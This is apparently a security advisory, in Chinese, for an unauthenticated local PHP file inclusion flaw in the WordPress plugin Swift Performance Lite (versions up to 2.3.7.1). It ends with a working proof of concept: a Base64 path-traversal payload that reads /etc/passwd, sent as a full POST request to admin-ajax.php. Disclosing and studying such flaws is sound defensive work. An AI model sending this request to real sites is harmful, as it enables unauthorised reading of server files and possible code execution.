Swift Performance Lite <= 2.3.7.1 - 通过 'ajaxify' 的未认证本地 PHP 文件包含漏洞
WordPress 的 Swift Performance Lite 插件在 2.3.7.1 及之前的所有版本中,均存在通过 'ajaxify' 函数引发的本地 PHP 文件包含漏洞。这使得未认证的攻击者能够包含并执行服务器上的任意文件,从而执行这些文件中的任何 PHP 代码。在可以上传并包含图片及其他"安全"文件类型的情况下,该漏洞可被用于绕过访问控制、获取敏感数据或实现代码执行。
Base64 Payload = ["template-part","null","../../../../../etc/passwd"]
POST /wp-admin/admin-ajax.php HTTP/2
Host: wp-dev.ddev.site
Content-Type: application/x-www-form-urlencoded
Content-Length: 202
action=swift_performance_ajaxify&data=WyJ0ZW1wbGF0ZS1wYXJ0IiwibnVsbCIsIi4uLy4uLy4uLy4uLy4uL2V0Yy9wYXNzd2QiXQ==